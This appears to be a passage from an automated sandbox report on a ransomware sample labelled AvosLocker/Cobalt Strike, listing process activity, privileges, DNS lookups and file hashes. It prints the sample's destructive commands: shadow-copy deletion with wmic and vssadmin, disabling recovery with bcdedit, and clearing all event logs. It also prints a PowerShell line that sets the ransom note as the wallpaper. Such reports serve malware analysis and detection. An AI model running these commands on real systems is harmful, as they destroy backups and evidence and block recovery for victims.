Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4680 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 4680 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\SYSTEM32\cmd.exe
PID 1908 wrote to memory of 3180 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1908 wrote to memory of 3180 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3416 wrote to memory of 34968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3416 wrote to memory of 34968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2588 wrote to memory of 34976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2588 wrote to memory of 34976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4772 wrote to memory of 6392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 6392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 6404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2712 wrote to memory of 6404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4680 wrote to memory of 48624 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 48624 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 48624 wrote to memory of 3444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 48624 wrote to memory of 3444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 48624 wrote to memory of 3692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 48624 wrote to memory of 3692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\526292617.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

F:\GET_YOUR_FILES_BACK.txt

MD5 e88368c43d7de561cfbedc2b648244da
SHA1 44ec9116dd8dfe89df6549f96ec18dccef15cd20
SHA256 6ab96b28dc9bc5dd0130e8eee1a8810b87b60feeff054a6a8fa509110aaaa881
SHA512 e123f63bd0ff2507634c16832d71e3be6f9e52b39df4b1bd3003035f68c1c4c5692cf3cd566cfca4247569e7fe8da0c40aea2f78b9a7797def8de8b0eeef28fd

memory/6392-17562-0x000001F51E820000-0x000001F51E842000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xiwc0d1a.0ew.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79d3a960f51997915b243fbef8084741
SHA1 fe0e1081dd63119b4c03e528c28a3656902a3637
SHA256 0ba700c8d857fec0a2692a150be5991bcc83a129c45d395267eaee9205e6de50
SHA512 6ec9bb7dfebd8b0697996f66c29c728f0cdca1a7d0dc616d84d38c26567a3b0fbda6bb4ce29d656da35e5b10361315828f46e1438eac22ea0d9009aa6dd1ff2e